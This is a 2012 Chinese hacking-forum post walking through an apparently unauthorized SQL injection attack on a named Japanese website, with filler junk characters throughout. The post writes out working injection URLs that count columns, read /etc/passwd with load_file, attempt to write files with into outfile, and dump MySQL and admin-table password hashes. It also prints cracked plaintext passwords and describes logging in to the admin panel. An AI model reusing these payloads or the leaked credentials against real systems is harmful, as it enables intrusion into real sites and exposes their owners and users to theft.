找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 3179|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

- i/ b, q! s& ?- ?! |; e% T: ?
0x01. 检测 www.zuaa.jp 收集数据0 p% D2 Q$ q5 P' V5 e3 T! b
0 A3 ^% B# a1 r6 i7 M% @9 H

% T5 t" e5 l6 b% w# O/ }! _whatweb
4 q# H( O$ _9 o  g) l" C. W1 l& Q) [% h' f% f0 O/ t

5 ^' k8 b8 ?$ ~/ f! S6 o利用NMAP扫描
, o* Q/ \$ R! I3 l  m7 C" O0 _4 f" v2 w
. \, V4 u' B% I. g/ u中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持0 ]2 s( p5 B% r
0x02.找注入点
* T7 V. Y! A1 Q7 e找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3900 q$ u, `8 X. v

" X" u+ t1 \) O  J; Q& x7 s2 C9 P. m+ E* M: @2 k- M3 @/ `
0x03.order by
# Z6 N* R1 B8 a             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 12 @% `- l- h8 N# w( Y
7 {$ E. d7 F. d  ]4 X+ O. R# k2 k; s7 u
order by 28报错,order by 27正常, @- L* y" }  Z. t' W( Z
. B1 }3 x% ^( o4 X/ H# }
0x04.   union手动查询5 |' a4 ~; T: G
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
) O& f' E: b+ ~添加到 27 时正常显示 ' ^5 W! E  l1 x) w

, E  a! \* F% W. d6 r: \中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
! C# W. j2 |' t) @  H+ i: b% @; y+ s
0x05. info:
$ m" z; M8 e- ]# d# i/ }+ khttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
0 U! H( k7 a" Z  I* x* b/ L" n, I& F: v. R9 z; c
user:            root@localhost+ p2 V) Y8 Z, [3 W2 x
database:    openpne1 z4 X/ [% m7 m! X- t
version:      4.1.228 Z6 {/ B; c( i2 |: p( i" m
os:             portbld-freebsd5.4/ L. B6 ^+ P  }7 a0 N
, s! R, ]4 P- T* x9 J
0x06. root用户( a) H2 e4 K" H: i4 ^  G
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)' m* v' D" H( w3 }
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 8 g: ^; [- @" p5 E& {# a

; ~1 V9 Y! h# j+ g通过工具转换
6 D* `& Y5 s% j6 f( s4 O& e8 n, o
$ |4 @% I8 E3 i; M% [8 S中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持# s# g: ]) o) o. w

6 @8 T/ ]( t6 H# k. V! K, Q( p0x07. 利用 into outfile8 J0 i1 O& W. B( i
全部都失败1 Y# }* e6 y" P
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php5 u: f8 R: R0 S5 u3 e

+ Q# O. v: G( `: vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
( P* N+ \5 \. `8 }) j; y& `2 [2 l. O! C' |1 v. U
页面显示“MDB2 Error:syntax error”
% }6 X. _$ m; E% m& H, \) x+ w: I4 F4 n# V& u$ U) ]
0x08. 利用 mysql 4.1
! K4 i4 y7 W5 r3 l0 M: f猜常规表名,字段未果 工具 sqlmap
) L9 g* Z; D8 D; C1 r. a7 c中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
" l# Q: `" }. W8 D% Z$ w" @& |& {
$ o! k; T( @* r- L' ^
' z; X# ?6 ~# g) h) J+ N: _0 I( ?# v2 H* q9 Q4 J) L8 m
0x09. 查找后台
& G& ?9 N( I! R利用 现有的各种 后台工具尝试都不行! V3 }: i- i: I( S  A  A3 T1 @" {) J

& k5 g# s1 x) h, h; K0x10.  MySL外联方法
1 J5 t3 |4 m( ?3 T2 r从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
2 o& T8 `0 s. P7 ]9 y: d" n可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
' w! C  w$ }, |; _& E# whttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user( a0 x6 U+ i# e$ J" x
/ b- B+ o5 E: Q3 `" ?: o- G& e7 ?
这个可以在 www.cmd5.com 解密
# k' u8 ?* t6 F) `! rroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009' {  V  j" B; h' J
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad979 L9 K' Y( ~! }' G# A) G- ^2 b
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???4 A6 h  F/ s" s! l5 i1 f7 i
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
; A5 n9 I  s7 l  v工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
$ {6 `# L" s7 [  J3 N
2 U. A6 a7 {: a' K* h) F) k: T$ R9 g, o9 D+ B( V
0x11. 网站突破
2 w5 ]6 _  B8 {' f: n9 X6 N8 H3 ~& i发现网站的源程序 openpne, google 下载 openpne 源码  ?2 E- w0 @: N, i2 S4 _7 f" e

) u' P6 M4 L" |" a5 r7 o; [6 K% e& [  X! }* j( d. |* i. s8 N
0x12. 默认信息利用( e2 n7 ^. k$ t* n# @5 f% W
http://sns.zuaa.jp/?m=admin&a=page_login% ~: a! d9 D3 s* X7 d

0 ?+ j5 v5 _3 q4 E: H0 c表名 (c_admin_user) ,字段名(username,password)
8 y+ s- h6 P1 `6 g1 Khttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
2 k# {- l, S* r
! n$ A8 O$ k4 n6 H8 _解密" @# D* H; o$ E" F& I
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
. u2 U' w0 w; L$ c" D+ v$ Tzuaajp:c0923ec5857796a393da99905008c176,          zju1897
- O8 b  O; i% G$ q3 S4 ?9 p% L5 Q1 p8 }
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持' l& D( C+ v$ d/ e
4 |: ^8 K" }  |2 K  n
0x13. 登录后台4 I+ [3 S# `, l3 ?- m- j- c' p
6 m$ a' |' y9 _/ n4 R! v

' y; _3 c5 z2 [  [# ~/ ~' {/ x, Q0 ?" s3 j4 u' z  s; Y3 ]5 x
0x14. 小结! f7 R; T6 l8 s, v
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。9 _) A# y" b" A& ^2 b* {
感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点1 U* m- ]: N' j, B: e* ^, X4 K
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
- E2 m2 d7 T/ C# x* }中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持8 n* w$ c  B' J! }2 ^; r  K
* f" _2 O2 D6 w3 l6 x1 W/ o
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!. B# T* v! Y3 {: o7 O

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表